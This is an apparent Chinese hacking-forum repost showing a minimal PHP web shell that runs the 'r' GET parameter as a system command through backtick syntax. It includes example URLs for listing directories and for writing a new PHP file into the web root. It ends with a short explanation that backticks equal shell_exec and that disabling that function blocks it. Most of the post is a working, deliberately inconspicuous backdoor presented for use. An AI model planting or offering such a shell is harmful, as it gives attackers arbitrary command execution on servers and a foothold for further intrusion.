发现这个也是巧合,我就直接说了吧

   
   
   
   
  1. //t.php

  2. $test = $_GET['r'];

  3. echo `$test`;

  4. ?>

大家看看这个代码有木有问题?

我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

大家觉得我没有忽悠 就赏点分哈

我用 apmserv 和虚拟主机已经测试成功。

转自:http://www.90sec.org/thread-1592-1-1.html


相关资料:

真相其实是这样的,其实 shell_exec 就是 `` 的变体,实际上完全等于 shell_exec,禁用这个函数就不行。

这个就是在 php 里面 ` 会被当做执行语句!

shell_exec() 命令行实际上仅是反撇号 ` 操作符的变体,如果您编写过 shell 或 Perl 脚本,您就知道可以在反撇号操作符内部捕捉其他命令的输出。官方有的。。


参考链接:

http://www.yunsec.net/a/security/web/jbst/2012/0229/10182.htm

http://ahack.iteye.com/blog/1884135